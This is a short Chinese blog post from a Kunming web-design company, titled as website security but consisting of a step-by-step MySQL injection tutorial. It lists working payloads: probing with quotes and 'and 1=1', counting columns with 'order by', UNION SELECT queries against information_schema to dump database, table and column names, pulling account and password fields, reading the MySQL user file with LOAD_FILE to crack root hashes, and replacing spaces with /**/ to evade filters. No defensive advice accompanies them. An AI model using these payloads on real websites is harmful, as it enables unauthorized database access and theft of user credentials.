网站制作安全之mysql注入技巧

来源：昆明多彩网络公司日期：2011-09-19 阅读：发表评论

mysql注入指得是通过程序的漏洞（比如没有过滤），通过执行sql语句进行入侵网站并最终得到服务器权限的行为

mysql注入大致流程：

1、得到注入点，在页面参数后面加'或者and 1=1和and 1=2测试，如果程序报错或者有一些异常情况（比如执行结果不同）发生则表明该页面有漏洞存在。

2、在参数后面加入 order by 10，10，如果没有什么反应则将后面的10继续增加，如果报错就说明字段数少于该数。

3、暴数据库名，假设当前被注入表的字段数有3个，通过下面两种方式得到

3.1 union select database(),user(),version()

3.1 在后面加入 union select 1,SCHEMA_NAME,3 from information_schema.SCHEMATA limit 2,1，将得到数据库名称，第一个数据库为information_schema

4、暴表名，and 1=2 union select 1,table_name,3 from (select * from information_schema.tables where table_schema=0x6861636B)t limit 0,1 0x6861636B为数据库名称转成了16进制，用小葵花工具转换得到，通过上一步可以得到，注意limit前面的t不能省略。

5、暴字段名 and 1=2 union select 1,2,column_name from (select * from information_schema.columns where table_name=0x61646D696E and table_schema=0x6861636B)t limit 0,1；0x61646D696E为表名，table_schema为字段名。

6、union select 1,"字段1","字段2" from "表名" limit 0,1，就可以得到帐户和密码了。

7、其他：得到root的密码通过LOAD_FILE(’C:\..\MYSQL\DATA\MYSQL\USER.MYD’)得到用户的HASH散列,之后用CAIN爆破…如果程序过滤了空格，可以使用/**/相当于空格作用

上一篇：网站建设之设计是种垄断下一篇：网站制作中chrome(google浏览器)的若干技巧

发表评论评论列表（有条评论）

相关文章：: 表单输入和网站安全的几个要点? 阅读:133; 网站的安全和防黑客攻击要点阅读:310

最热文章：: 新手怎么制作网页? 阅读:7660; jcarousellite中文文档阅读:6507; 表单元素input、按钮、文字完美垂阅读:6247; 怎么使chrome(谷歌google 阅读:6145; phpMailer中文文档手册阅读:4639

云南网站建设创新企业昆明多彩网络公司

网站公告

网站建设理念

网站建设常见问题